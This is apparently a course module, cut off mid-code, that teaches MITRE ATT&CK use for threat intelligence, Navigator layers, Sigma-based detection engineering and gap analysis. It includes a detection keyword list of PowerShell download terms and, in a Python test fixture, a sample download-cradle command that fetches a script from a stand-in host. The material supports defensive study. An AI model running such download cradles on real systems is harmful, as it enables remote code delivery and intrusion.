Opening Framing
Before MITRE ATT&CK, security teams struggled to communicate about adversary behavior. One team called it "lateral movement," another called it "pivoting," a third called it "network propagation." Threat reports used inconsistent terminology. Detection rules couldn't be compared. Defensive gaps were invisible because there was no standard way to map them.
MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) changed this by creating a comprehensive, structured knowledge base of adversary behavior. It provides a common vocabulary, a framework for organizing intelligence, and a foundation for measuring defensive coverage. Today, ATT&CK is the de facto standard for describing how adversaries operate.
This week provides a deep dive into ATT&CK: its structure, how to use it for threat intelligence, how to map detections, how to assess defensive gaps, and how to leverage the Navigator tool. You'll learn to use ATT&CK as a practical tool for improving security operations.
Key insight: ATT&CK isn't just a reference—it's an operational tool. Master it, and you gain a superpower for threat analysis and defensive planning.
1) ATT&CK Structure and Components
Understanding ATT&CK's hierarchical structure is essential for effective use:
ATT&CK Hierarchy:
┌─────────────────────────────────────────────────────────────┐
│ MATRICES │
│ Different technology domains: │
│ - Enterprise (Windows, macOS, Linux, Cloud, Network, etc.) │
│ - Mobile (Android, iOS) │
│ - ICS (Industrial Control Systems) │
└─────────────────────────────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────┐
│ TACTICS (The "Why") │
│ Adversary's tactical goal - what they're trying to achieve │
│ │
│ Enterprise Tactics: │
│ TA0043 Reconnaissance TA0001 Initial Access │
│ TA0042 Resource Development TA0002 Execution │
│ TA0003 Persistence TA0004 Privilege Escalation │
│ TA0005 Defense Evasion TA0006 Credential Access │
│ TA0007 Discovery TA0008 Lateral Movement │
│ TA0009 Collection TA0011 Command and Control │
│ TA0010 Exfiltration TA0040 Impact │
└─────────────────────────────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────┐
│ TECHNIQUES (The "How") │
│ How adversaries achieve tactical goals │
│ │
│ Example under Persistence (TA0003): │
│ T1547 Boot or Logon Autostart Execution │
│ T1053 Scheduled Task/Job │
│ T1543 Create or Modify System Process │
│ T1136 Create Account │
│ T1505 Server Software Component │
└─────────────────────────────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────┐
│ SUB-TECHNIQUES (Specific Implementation) │
│ More specific ways to implement a technique │
│ │
│ Example under T1547 Boot or Logon Autostart: │
│ T1547.001 Registry Run Keys / Startup Folder │
│ T1547.002 Authentication Package │
│ T1547.003 Time Providers │
│ T1547.004 Winlogon Helper DLL │
│ T1547.005 Security Support Provider │
│ T1547.009 Shortcut Modification │
└─────────────────────────────────────────────────────────────┘
Technique Entry Components:
ATT&CK Technique Entry Structure:
┌─────────────────────────────────────────────────────────────┐
│ TECHNIQUE: T1059.001 - PowerShell │
├─────────────────────────────────────────────────────────────┤
│ TACTIC: Execution (TA0002) │
├─────────────────────────────────────────────────────────────┤
│ DESCRIPTION: │
│ Adversaries may abuse PowerShell commands and scripts for │
│ execution. PowerShell is a powerful interactive command- │
│ line interface and scripting environment... │
├─────────────────────────────────────────────────────────────┤
│ PLATFORMS: Windows │
├─────────────────────────────────────────────────────────────┤
│ PERMISSIONS REQUIRED: User, Administrator │
├─────────────────────────────────────────────────────────────┤
│ DATA SOURCES: │
│ - Command: Command Execution │
│ - Module: Module Load │
│ - Process: Process Creation │
│ - Script: Script Execution │
├─────────────────────────────────────────────────────────────┤
│ DETECTION: │
│ Monitor for execution of PowerShell, especially with │
│ encoded commands, download cradles, or suspicious cmdlets...│
├─────────────────────────────────────────────────────────────┤
│ MITIGATIONS: │
│ M1042 Disable or Remove Feature or Program │
│ M1049 Antivirus/Antimalware │
│ M1045 Code Signing │
│ M1038 Execution Prevention │
│ M1026 Privileged Account Management │
├─────────────────────────────────────────────────────────────┤
│ PROCEDURE EXAMPLES: │
│ - APT29 used PowerShell to execute payloads │
│ - FIN7 uses PowerShell for C2 communication │
│ - Emotet uses PowerShell download cradles │
├─────────────────────────────────────────────────────────────┤
│ REFERENCES: │
│ [Links to research, reports, documentation] │
└─────────────────────────────────────────────────────────────┘
Data Sources:
ATT&CK Data Sources:
Data Sources define WHERE to look for evidence:
DS0015 Application Log
├── Application Log Content
DS0017 Command
├── Command Execution
DS0022 File
├── File Access
├── File Creation
├── File Deletion
├── File Metadata
├── File Modification
DS0029 Network Traffic
├── Network Connection Creation
├── Network Traffic Content
├── Network Traffic Flow
DS0009 Process
├── OS API Execution
├── Process Access
├── Process Creation
├── Process Metadata
├── Process Modification
├── Process Termination
DS0024 Windows Registry
├── Windows Registry Key Access
├── Windows Registry Key Creation
├── Windows Registry Key Deletion
├── Windows Registry Key Modification
Using Data Sources:
1. Identify techniques of concern
2. Note required data sources
3. Verify you collect that data
4. Build detections using that data
Example:
Technique: T1547.001 (Registry Run Keys)
Data Source: Windows Registry Key Modification
Collection: Enable registry auditing, EDR telemetry
Detection: Alert on Run key modifications
Key insight: Data sources tell you what visibility you need. If you can't collect the required data source, you can't detect the technique.
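The four-step data source check above can be scripted so that it is repeatable across the whole technique list. The Python below is an added example, not code from MITRE or this course: the technique-to-data-component map is a hand-copied subset of what the ATT&CK entries list (verify against the live entries), and the sensor inventory is constructed to show one full, two partial and one blind technique.

```python
from collections import defaultdict

# Constructed subset of the data components each technique's ATT&CK entry lists;
# check the live entry at attack.mitre.org for the authoritative set.
TECHNIQUE_DATA_COMPONENTS = {
    "T1059.001": {"Command Execution", "Module Load", "Process Creation",
                  "Script Execution"},
    "T1547.001": {"Command Execution", "Process Creation",
                  "Windows Registry Key Creation",
                  "Windows Registry Key Modification"},
    "T1105": {"Command Execution", "File Creation",
              "Network Connection Creation", "Network Traffic Content",
              "Network Traffic Flow"},
    "T1090.004": {"Network Traffic Content"},
}

# Constructed collection inventory: sensor -> data components it delivers.
# There is no full packet capture, so nothing provides "Network Traffic Content",
# and script block logging is off, so nothing provides "Script Execution".
COLLECTION_INVENTORY = {
    "edr": {"Process Creation", "Command Execution", "Module Load",
            "File Creation", "Network Connection Creation"},
    "sysmon": {"Process Creation", "Windows Registry Key Creation",
               "Windows Registry Key Modification"},
    "netflow": {"Network Traffic Flow"},
}


def components_by_sensor(inventory):
    """Invert the inventory: data component -> set of sensors providing it."""
    providers = defaultdict(set)
    for sensor, components in inventory.items():
        for component in components:
            providers[component].add(sensor)
    return providers


def visibility_report(requirements, inventory):
    """Classify each technique's visibility as 'full', 'partial' or 'none'
    and list the required data components that no sensor collects."""
    providers = components_by_sensor(inventory)
    report = {}
    for tid, needed in requirements.items():
        missing = sorted(c for c in needed if c not in providers)
        available = needed - set(missing)
        if not available:
            status = "none"      # no relevant telemetry at all: undetectable
        elif missing:
            status = "partial"   # some evidence exists, some channels are blind
        else:
            status = "full"
        report[tid] = {
            "status": status,
            "missing": missing,
            "sensors": sorted({s for c in available for s in providers[c]}),
        }
    return report


if __name__ == "__main__":
    for tid, row in visibility_report(TECHNIQUE_DATA_COMPONENTS,
                                      COLLECTION_INVENTORY).items():
        print(f"{tid:10} {row['status']:8} missing={row['missing']} "
              f"sensors={row['sensors']}")
```

A technique reported as "none" (here T1090.004, which needs Network Traffic Content) is the case the key insight describes: no rule can be written until the collection gap is closed, so it belongs on the telemetry backlog rather than the detection backlog.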
2) Using ATT&CK for Threat Intelligence
ATT&CK provides a structured way to document, communicate, and operationalize threat intelligence:
Mapping Threat Reports to ATT&CK:
Step 1: READ the threat report carefully
Step 2: IDENTIFY adversary behaviors described
"The malware establishes persistence via registry run keys"
"Attackers used PowerShell to download additional payloads"
"Data was exfiltrated over HTTPS to cloud storage"
Step 3: MAP to ATT&CK techniques
- Registry run keys → T1547.001
- PowerShell download → T1059.001, T1105
- HTTPS exfiltration → T1041, T1567.002
Step 4: DOCUMENT with context
┌────────────────┬────────────────────────────────────────────┐
│ Technique      │ Context from Report                        │
├────────────────┼────────────────────────────────────────────┤
│ T1547.001      │ HKCU\Software\Microsoft\Windows\           │
│                │ CurrentVersion\Run\UpdateSvc               │
├────────────────┼────────────────────────────────────────────┤
│ T1059.001      │ PowerShell -enc [base64] download cradle   │
├────────────────┼────────────────────────────────────────────┤
│ T1567.002      │ Exfil to legitimate cloud storage service  │
└────────────────┴────────────────────────────────────────────┘
Step 5: OPERATIONALIZE
- Create detections for mapped techniques
- Hunt for technique indicators
- Brief stakeholders using ATT&CK language
Building Threat Actor Profiles with ATT&CK:
ATT&CK-Based Actor Profile:
APT29 Technique Coverage:
RECONNAISSANCE:
└── T1598.003 Spearphishing Link
INITIAL ACCESS:
├── T1566.001 Spearphishing Attachment
├── T1566.002 Spearphishing Link
├── T1195.002 Compromise Software Supply Chain
└── T1199 Trusted Relationship
EXECUTION:
├── T1059.001 PowerShell
├── T1059.003 Windows Command Shell
└── T1047 Windows Management Instrumentation
PERSISTENCE:
├── T1547.001 Registry Run Keys
├── T1053.005 Scheduled Task
└── T1505.003 Web Shell
PRIVILEGE ESCALATION:
├── T1055 Process Injection
└── T1134 Access Token Manipulation
DEFENSE EVASION:
├── T1027 Obfuscated Files
├── T1070 Indicator Removal
├── T1036 Masquerading
└── T1218 System Binary Proxy Execution
CREDENTIAL ACCESS:
├── T1003.001 LSASS Memory
├── T1558.003 Kerberoasting
└── T1552.001 Credentials in Files
DISCOVERY:
├── T1083 File and Directory Discovery
├── T1057 Process Discovery
└── T1018 Remote System Discovery
LATERAL MOVEMENT:
├── T1021.001 Remote Desktop Protocol
├── T1021.002 SMB/Windows Admin Shares
└── T1021.006 Windows Remote Management
COLLECTION:
├── T1560 Archive Collected Data
└── T1005 Data from Local System
COMMAND AND CONTROL:
├── T1071.001 Web Protocols
├── T1090.004 Domain Fronting
└── T1573 Encrypted Channel
EXFILTRATION:
└── T1041 Exfiltration Over C2 Channel
Comparing Threat Actors:
Technique Comparison Matrix:
                          │ APT29 │ APT28 │ Lazarus │ FIN7
──────────────────────────┼───────┼───────┼─────────┼──────
T1566.001 Phishing Attach │   ●   │   ●   │    ●    │  ●
T1195.002 Supply Chain    │   ●   │       │    ●    │
T1059.001 PowerShell      │   ●   │   ●   │    ●    │  ●
T1053.005 Scheduled Task  │   ●   │   ●   │    ●    │  ●
T1003.001 LSASS Memory    │   ●   │   ●   │    ●    │  ●
T1021.001 RDP             │   ●   │   ●   │         │  ●
T1090.004 Domain Fronting │   ●   │       │         │
T1486 Data Encryption     │       │       │    ●    │
Common Techniques: T1566.001, T1059.001, T1053.005, T1003.001
- Prioritize detection for techniques used by multiple actors
Unique Techniques:
- APT29: Supply chain, domain fronting
- Lazarus: Destructive capabilities (T1486)
Defensive Implications:
- Common techniques = highest detection priority
- Unique techniques = actor-specific detection
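The comparison matrix and the common/unique lists that follow it are set operations over per-actor technique lists, and computing them from data scales to many more actors than fit in a hand-drawn table. The Python below is an added example for this course, not MITRE code; the per-actor technique sets are transcribed from the matrix above (so they are illustrative, not the full ATT&CK group pages), and `render_matrix` reproduces the table layout used here.

```python
# Constructed from the comparison matrix above: actor -> set of technique IDs.
ACTOR_TECHNIQUES = {
    "APT29":   {"T1566.001", "T1195.002", "T1059.001", "T1053.005",
                "T1003.001", "T1021.001", "T1090.004"},
    "APT28":   {"T1566.001", "T1059.001", "T1053.005", "T1003.001", "T1021.001"},
    "Lazarus": {"T1566.001", "T1195.002", "T1059.001", "T1053.005",
                "T1003.001", "T1486"},
    "FIN7":    {"T1566.001", "T1059.001", "T1053.005", "T1003.001", "T1021.001"},
}


def technique_prevalence(actors):
    """technique ID -> sorted list of the actors observed using it."""
    prevalence = {}
    for actor, techniques in actors.items():
        for tid in techniques:
            prevalence.setdefault(tid, []).append(actor)
    return {tid: sorted(who) for tid, who in prevalence.items()}


def shared_techniques(actors, min_actors=None):
    """Techniques used by at least `min_actors` actors (default: by every actor)."""
    threshold = len(actors) if min_actors is None else min_actors
    return {tid for tid, who in technique_prevalence(actors).items()
            if len(who) >= threshold}


def unique_techniques(actors):
    """actor -> techniques that no other actor in the comparison uses."""
    prevalence = technique_prevalence(actors)
    return {actor: {tid for tid in techniques if prevalence[tid] == [actor]}
            for actor, techniques in actors.items()}


def detection_priority(actors):
    """Techniques ranked by how many actors use them (most widely shared first)."""
    prevalence = technique_prevalence(actors)
    return sorted(prevalence, key=lambda tid: (-len(prevalence[tid]), tid))


def render_matrix(actors):
    """Plain-text matrix in the style used above: one row per technique."""
    names = list(actors)
    prevalence = technique_prevalence(actors)
    header = " " * 10 + " │ " + " │ ".join(f"{n:^7}" for n in names)
    lines = [header, "─" * len(header)]
    for tid in detection_priority(actors):
        cells = " │ ".join(f"{'●' if n in prevalence[tid] else ' ':^7}"
                           for n in names)
        lines.append(f"{tid:10} │ {cells}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_matrix(ACTOR_TECHNIQUES))
    print("Common to all:", sorted(shared_techniques(ACTOR_TECHNIQUES)))
    print("Shared by 2+:", sorted(shared_techniques(ACTOR_TECHNIQUES, 2)))
    print("Unique:", unique_techniques(ACTOR_TECHNIQUES))
```

`shared_techniques(actors, 2)` gives the "used by multiple actors" set that drives detection priority, while `unique_techniques` surfaces the actor-specific detections; `detection_priority` is the ordering you would feed into a Navigator layer's scores.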
Key insight: ATT&CK enables apples-to-apples comparison of threat actors. You can identify commonalities across actors targeting your sector and prioritize accordingly.
3) ATT&CK Navigator
The ATT&CK Navigator is a web-based tool for visualizing and working with ATT&CK matrices:
Navigator Capabilities:
VISUALIZATION:
┌─────────────────────────────────────────────────────────────┐
│ - View full ATT&CK matrix │
│ - Color-code techniques │
│ - Add scores and comments │
│ - Create custom views │
└─────────────────────────────────────────────────────────────┘
LAYERS:
┌─────────────────────────────────────────────────────────────┐
│ Layers are saved views with: │
│ - Technique selections │
│ - Color coding │
│ - Scores (0-100) │
│ - Comments │
│ - Metadata │
│ │
│ Layer Types: │
│ - Threat actor coverage │
│ - Detection coverage │
│ - Control coverage │
│ - Gap analysis │
│ - Hunt priorities │
└─────────────────────────────────────────────────────────────┘
LAYER OPERATIONS:
┌─────────────────────────────────────────────────────────────┐
│ Combine multiple layers: │
│ │
│ Layer A (Threat Actor TTPs) │
│ + │
│ Layer B (Detection Coverage) │
│ = │
│ Gap Analysis (What we can't detect) │
│ │
│ Operations: Score addition, subtraction, intersection │
└─────────────────────────────────────────────────────────────┘
Creating Layers:
Navigator Layer JSON Structure:
{
  "name": "APT29 Techniques",
  "versions": {
    "attack": "14",
    "navigator": "4.9.1",
    "layer": "4.5"
  },
  "domain": "enterprise-attack",
  "description": "TTPs attributed to APT29",
  "techniques": [
    {
      "techniqueID": "T1566.001",
      "tactic": "initial-access",
      "color": "#ff6666",
      "comment": "Primary initial access via phishing",
      "score": 100,
      "enabled": true
    },
    {
      "techniqueID": "T1059.001",
      "tactic": "execution",
      "color": "#ff6666",
      "comment": "Heavy PowerShell usage observed",
      "score": 90
    }
  ],
  "gradient": {
    "colors": ["#ffffff", "#ff6666"],
    "minValue": 0,
    "maxValue": 100
  },
  "legendItems": [
    {"label": "Confirmed", "color": "#ff6666"},
    {"label": "Suspected", "color": "#ffcc66"}
  ]
}
Creating a Layer:
1. Navigate to attack.mitre.org/navigator
2. Create new layer
3. Select techniques (click to highlight)
4. Add colors, scores, comments
5. Export as JSON for reuse
Practical Navigator Uses:
Use Case 1: Threat Actor Visualization
1. Research actor TTPs from reports
2. Create layer with actor's techniques
3. Color by confidence:
- Red: Confirmed usage
- Orange: Suspected/reported once
- Yellow: Associated tools could enable
4. Share with team for awareness
Use Case 2: Detection Coverage Mapping
1. Inventory existing detections
2. Map each detection to ATT&CK technique
3. Create layer:
- Green: Technique detected
- Yellow: Partial coverage
- Red/blank: No detection
4. Identify gaps for improvement
Use Case 3: Gap Analysis
Layer A: Relevant threat actor TTPs
Layer B: Current detection coverage
Operation: A minus B
Result: Techniques used by threats we can't detect
= Priority detection engineering backlog
Use Case 4: Control Mapping
1. List security controls (EDR, firewall, etc.)
2. Map each control to techniques it addresses
3. Create layer showing control coverage
4. Identify techniques with no control coverage
5. Inform security architecture decisions
Use Case 5: Hunt Prioritization
1. Start with threat actor layer
2. Subtract detection coverage layer
3. Result = Techniques requiring hunting
4. Prioritize hunts based on:
- Actor relevance
- Detection difficulty
- Potential impact
Key insight: Navigator layers are shareable artifacts. Create once, share across teams, update as coverage improves.
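Because layers are plain JSON, the "Layer A minus Layer B" gap analysis of Use Case 3 can be produced by a script and then opened in Navigator, which is useful when the coverage layer is regenerated from a rule inventory every week. The Python below is an added example written for this course, not part of the Navigator project: `make_layer` emits the layer structure shown above, `subtract_layers` is a script-side approximation of Navigator's score subtraction (remaining score = threat score minus detection score, floored at zero), and the two input layers are constructed.

```python
import json

# Version block copied from the sample layer above; update to match your Navigator.
LAYER_VERSIONS = {"attack": "14", "navigator": "4.9.1", "layer": "4.5"}


def make_layer(name, description, techniques, color="#ff6666"):
    """Build a Navigator layer dict.

    `techniques` maps technique ID -> (tactic shortname, score 0-100, comment).
    Scores drive the gradient, so minValue/maxValue are fixed to 0 and 100."""
    return {
        "name": name,
        "versions": dict(LAYER_VERSIONS),
        "domain": "enterprise-attack",
        "description": description,
        "techniques": [
            {"techniqueID": tid, "tactic": tactic, "color": color,
             "comment": comment, "score": score, "enabled": True}
            for tid, (tactic, score, comment) in sorted(techniques.items())
        ],
        "gradient": {"colors": ["#ffffff", color], "minValue": 0, "maxValue": 100},
    }


def subtract_layers(threat, coverage, name="Gap analysis (threat minus detection)"):
    """Script-side equivalent of the 'A minus B' score operation: each threat
    technique keeps threat_score - detection_score, floored at 0. Techniques
    whose remaining score is 0 are fully covered and are dropped."""
    detected = {t["techniqueID"]: t.get("score", 0) for t in coverage["techniques"]}
    gaps = {}
    for t in threat["techniques"]:
        tid = t["techniqueID"]
        remaining = max(0, t.get("score", 0) - detected.get(tid, 0))
        if remaining > 0:
            gaps[tid] = (t["tactic"], remaining,
                         f"threat {t.get('score', 0)} - detection {detected.get(tid, 0)}")
    return make_layer(name, "Techniques relevant threats use that we do not fully detect",
                      gaps, color="#ff9900")


def gap_backlog(gap_layer):
    """Ordered (technique, remaining score) list: the detection engineering backlog."""
    return sorted(((t["techniqueID"], t["score"]) for t in gap_layer["techniques"]),
                  key=lambda pair: (-pair[1], pair[0]))


# Constructed inputs: a small threat layer and a detection coverage layer.
THREAT = make_layer("Actor TTPs", "constructed threat layer", {
    "T1566.001": ("initial-access", 100, "primary initial access"),
    "T1059.001": ("execution", 90, "heavy PowerShell use"),
    "T1090.004": ("command-and-control", 80, "domain fronting reported"),
})
COVERAGE = make_layer("Detection coverage", "constructed coverage layer", {
    "T1566.001": ("initial-access", 100, "email gateway + sandbox"),
    "T1059.001": ("execution", 75, "3 rules, tested"),
}, color="#66cc66")

if __name__ == "__main__":
    gap = subtract_layers(THREAT, COVERAGE)
    print(json.dumps(gap, indent=2))   # save and open in Navigator as an existing layer
    print("Backlog:", gap_backlog(gap))
```

With these inputs the phishing technique disappears from the gap layer (fully covered), PowerShell keeps a residual score of 15, and domain fronting keeps its full 80, which is exactly the ordering a detection engineering backlog should show.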
4) Detection Engineering with ATT&CK
ATT&CK provides a framework for systematic detection development:
ATT&CK-Based Detection Engineering:
Process:
┌─────────────────────────────────────────────────────────────┐
│ 1. PRIORITIZE techniques based on: │
│ - Threat actor relevance │
│ - Current detection gaps │
│ - Data availability │
│ - Detection feasibility │
├─────────────────────────────────────────────────────────────┤
│ 2. RESEARCH the technique: │
│ - Read ATT&CK description │
│ - Review procedure examples │
│ - Study referenced research │
│ - Understand variations │
├─────────────────────────────────────────────────────────────┤
│ 3. IDENTIFY data sources: │
│ - What telemetry is needed? │
│ - Do we collect this data? │
│ - What enrichment helps? │
├─────────────────────────────────────────────────────────────┤
│ 4. DEVELOP detection logic: │
│ - What indicates this technique? │
│ - How to reduce false positives? │
│ - What context improves fidelity? │
├─────────────────────────────────────────────────────────────┤
│ 5. TEST and validate: │
│ - Test against benign activity │
│ - Test against simulated attack │
│ - Tune for environment │
├─────────────────────────────────────────────────────────────┤
│ 6. DOCUMENT: │
│ - ATT&CK technique covered │
│ - Detection logic │
│ - Data sources required │
│ - Known limitations │
│ - Testing results │
└─────────────────────────────────────────────────────────────┘
Sigma Rules and ATT&CK:
Sigma Rule with ATT&CK Mapping:
title: Suspicious PowerShell Download Cradle
id: e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97
status: experimental
description: Detects PowerShell download cradles commonly used for malware delivery
references:
  - https://attack.mitre.org/techniques/T1059/001/
  - https://attack.mitre.org/techniques/T1105/
author: Security Analyst
date: 2024/03/15
tags:
  - attack.execution
  - attack.t1059.001
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    - Image|endswith: '\powershell.exe'
    - Image|endswith: '\pwsh.exe'
  selection_commands:
    CommandLine|contains:
      - 'IEX'
      - 'Invoke-Expression'
      - 'Invoke-WebRequest'
      - 'iwr '
      - 'wget '
      - 'curl '
      - 'Net.WebClient'
      - 'DownloadString'
      - 'DownloadFile'
  condition: selection_img and selection_commands
falsepositives:
  - Legitimate admin scripts
  - Software deployment tools
level: high
ATT&CK Coverage:
- T1059.001: PowerShell (Execution)
- T1105: Ingress Tool Transfer (C2)
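Step 5 of the process above ("test against benign activity, test against simulated attack") is easiest to reason about when the rule's matching logic is run over a handful of sample events. The Python below is an added example for this course, not a Sigma project tool or an official backend: it transcribes only the `detection` section of the rule above (Sigma string modifiers match case-insensitively), pulls the technique IDs out of the `attack.*` tags the way a SIEM labels alerts, and runs the rule over four constructed process-creation events, one of which is the "software deployment tool" false positive the rule itself lists.

```python
import re

# The rule's detection section, transcribed from the Sigma rule above into
# Python; rule metadata is omitted. Sigma string modifiers are case-insensitive.
SELECTION_IMG = ["\\powershell.exe", "\\pwsh.exe"]            # Image|endswith (OR)
SELECTION_COMMANDS = ["IEX", "Invoke-Expression", "Invoke-WebRequest", "iwr ",
                      "wget ", "curl ", "Net.WebClient", "DownloadString",
                      "DownloadFile"]                          # CommandLine|contains (OR)
RULE_TAGS = ["attack.execution", "attack.t1059.001",
             "attack.command_and_control", "attack.t1105"]

TECHNIQUE_TAG = re.compile(r"^attack\.(t\d{4}(?:\.\d{3})?)$")


def rule_matches(event):
    """condition: selection_img and selection_commands."""
    image = event.get("Image", "").lower()
    cmdline = event.get("CommandLine", "").lower()
    img_hit = any(image.endswith(s.lower()) for s in SELECTION_IMG)
    cmd_hit = any(s.lower() in cmdline for s in SELECTION_COMMANDS)
    return img_hit and cmd_hit


def techniques_from_tags(tags):
    """Pull ATT&CK technique IDs out of Sigma tags (attack.t1059.001 -> T1059.001)."""
    return [m.group(1).upper() for m in map(TECHNIQUE_TAG.match, tags) if m]


def run_rule(events):
    """Indices of matching events plus the techniques the alert is labelled with."""
    hits = [i for i, event in enumerate(events) if rule_matches(event)]
    return {"hits": hits, "techniques": techniques_from_tags(RULE_TAGS)}


# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/stage.ps1')"},  # simulated cradle
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c curl https://example.invalid/report.csv"},   # wrong image
    {"Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh.exe -Command Get-Process | Sort-Object CPU"},      # benign, no cradle
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Invoke-WebRequest -Uri "
                    "https://updates.example.invalid/agent.msi "
                    "-OutFile C:\\Temp\\agent.msi"},  # deployment tool: listed false positive
]

if __name__ == "__main__":
    print(run_rule(SAMPLE_EVENTS))
```

Event 3 matching is the point of the exercise: the rule fires on a legitimate deployment download exactly as the `falsepositives` section predicts, so tuning (an allowlist of deployment hosts or parent processes, or correlation with the Script Execution data source) belongs in the documentation step alongside the two technique IDs the alert carries.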
Detection Coverage Assessment:
Measuring Detection Coverage:
Coverage Scoring:
┌───────┬────────────────────────────────────────────────────┐
│ Score │ Definition                                         │
├───────┼────────────────────────────────────────────────────┤
│   0   │ No detection capability                            │
│  25   │ Minimal: May detect obvious implementations        │
│  50   │ Partial: Detects common implementations            │
│  75   │ Good: Detects most implementations                 │
│  100  │ Comprehensive: High confidence detection           │
└───────┴────────────────────────────────────────────────────┘
Assessment Questions per Technique:
1. Do we collect required data sources?
2. Do we have detection rules for this technique?
3. Have we tested the detections?
4. What percentage of implementations would we detect?
5. What is our false positive rate?
Coverage Matrix Example:
Technique        │ Data │ Rules │ Tested │ Score │
─────────────────┼──────┼───────┼────────┼───────┤
T1059.001 PS     │  ✓   │   3   │   ✓    │  75   │
T1547.001 RegRun │  ✓   │   2   │   ✓    │  75   │
T1003.001 LSASS  │  ✓   │   2   │   ✓    │  50   │
T1055 Injection  │  ✓   │   1   │   ○    │  25   │
T1090.004 DomFr  │  ○   │   0   │        │   0   │
Legend: ✓ = Yes, ○ = Partial, blank = No
Improvement Priority:
1. T1090.004 - No coverage, need data source
2. T1055 - Rule exists but untested
3. T1003.001 - Need additional rules
Key insight: ATT&CK-based detection coverage creates a measurable security metric. You can track improvement over time and prioritize detection engineering work.
5) Defensive Gap Analysis
ATT&CK enables systematic identification of defensive gaps against relevant threats:
Gap Analysis Process:
Step 1: IDENTIFY Relevant Threats
┌─────────────────────────────────────────────────────────────┐
│ Consider: │
│ - Threat actors targeting your industry │
│ - Recent campaigns against similar organizations │
│ - Threats mentioned in intelligence requirements │
│ │
│ Create: Combined threat layer in Navigator │
└─────────────────────────────────────────────────────────────┘
Step 2: MAP Current Defenses
┌─────────────────────────────────────────────────────────────┐
│ Document: │
│ - Detection rules and coverage │
│ - Security controls in place │
│ - Visibility (data sources collected) │
│ │
│ Create: Defense coverage layer in Navigator │
└─────────────────────────────────────────────────────────────┘
Step 3: COMPARE Threat vs. Defense
┌─────────────────────────────────────────────────────────────┐
│ Analysis: │
│ - Overlay threat layer on defense layer │
│ - Identify techniques threats use that we don't detect │
│ - Identify techniques with partial coverage │
│ │
│ Result: Prioritized gap list │
└─────────────────────────────────────────────────────────────┘
Step 4: PRIORITIZE Gaps
┌─────────────────────────────────────────────────────────────┐
│ Factors: │
│ - How many relevant threats use this technique? │
│ - How critical is the tactic? (Initial access > Discovery) │
│ - How feasible is improving detection? │
│ - What resources are required? │
│ │
│ Output: Ranked improvement backlog │
└─────────────────────────────────────────────────────────────┘
Step 5: PLAN Improvements
┌─────────────────────────────────────────────────────────────┐
│ For each priority gap: │
│ - What data sources are needed? │
│ - What detection logic required? │
│ - What controls could mitigate? │
│ - What is the implementation timeline? │
│ │
│ Output: Detection engineering roadmap │
└─────────────────────────────────────────────────────────────┘
Gap Analysis Example:
Scenario: Financial Services Company
Step 1: Relevant Threats
- FIN7 (financially motivated)
- APT38 (DPRK bank heists)
- Scattered Spider (social engineering)
Combined: 45 unique techniques
Step 2: Current Defenses
- EDR with 60% technique coverage
- SIEM with 40% technique coverage
- Network monitoring: 30% technique coverage
Combined unique coverage: 65%
Step 3: Gap Identification
HIGH-PRIORITY GAPS (used by 2+ actors, no detection):
┌─────────────────────────────────────────────────────────────┐
│ T1566.002 Spearphishing Link │ All 3 actors use │
│ T1204.002 Malicious File │ All 3 actors use │
│ T1055.012 Process Hollowing │ FIN7, APT38 use │
│ T1218.011 Rundll32 │ FIN7, APT38 use │
│ T1070.004 File Deletion │ All 3 actors use │
└─────────────────────────────────────────────────────────────┘
MEDIUM-PRIORITY GAPS (used by 1+ actor, partial detection):
┌─────────────────────────────────────────────────────────────┐
│ T1059.001 PowerShell │ Detected but bypassable │
│ T1003.001 LSASS Memory │ Some implementations │
│ T1021.001 RDP │ Lateral only, not auth │
└─────────────────────────────────────────────────────────────┘
Step 4: Prioritized Roadmap
Q1: Initial Access Detection
- T1566.002: URL analysis, sandbox integration
- T1204.002: Enhanced email security, user training
Q2: Execution/Evasion Detection
- T1055.012: Memory analysis, behavior monitoring
- T1218.011: Application allowlisting, process monitoring
Q3: Anti-Forensics Detection
- T1070.004: File system monitoring, journal analysis
Control Gap Analysis:
Mapping Controls to ATT&CK:
Control: Multi-Factor Authentication (MFA)
Techniques Mitigated:
- T1078: Valid Accounts (reduces impact)
- T1110: Brute Force (blocks success)
- T1558: Steal Kerberos Tickets (limits use)
- T1539: Steal Web Session Cookie (reduces impact)
Control: Application Allowlisting
Techniques Mitigated:
- T1059: Command and Scripting Interpreter
- T1204: User Execution
- T1218: System Binary Proxy Execution
- T1053: Scheduled Task/Job (unauthorized)
Control: Network Segmentation
Techniques Mitigated:
- T1021: Remote Services (limits scope)
- T1570: Lateral Tool Transfer (limits scope)
- T1072: Software Deployment Tools (limits scope)
Gap Analysis Question:
"For each high-priority technique gap, what controls
could mitigate if detection is difficult?"
Example:
T1055.012 Process Hollowing
- Detection: Difficult, requires memory analysis
- Control Alternative: Application allowlisting
blocks unauthorized executables
- Recommendation: Implement allowlisting as
compensating control while developing detection
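The gap example for the financial services scenario, the coverage scores from section 4 and the control mapping just above are three inputs to one ranking, and it is worth seeing them combined in code. The Python below is an added example written for this course (not a MITRE tool): the actor technique sets are constructed to reproduce the counts in the HIGH/MEDIUM gap tables, the coverage scores are constructed on the page's 0-100 scale, and the control mapping is the one listed above at parent-technique level, with T1055 added to allowlisting as the Process Hollowing example recommends.

```python
# Constructed for illustration: which scenario actors use which techniques.
# Actor counts follow the gap tables above, not the full ATT&CK group pages.
ACTOR_TECHNIQUES = {
    "FIN7": {"T1566.002", "T1204.002", "T1055.012", "T1218.011", "T1070.004",
             "T1059.001", "T1021.001"},
    "APT38": {"T1566.002", "T1204.002", "T1055.012", "T1218.011", "T1070.004",
              "T1003.001"},
    "Scattered Spider": {"T1566.002", "T1204.002", "T1070.004", "T1021.001",
                         "T1078"},
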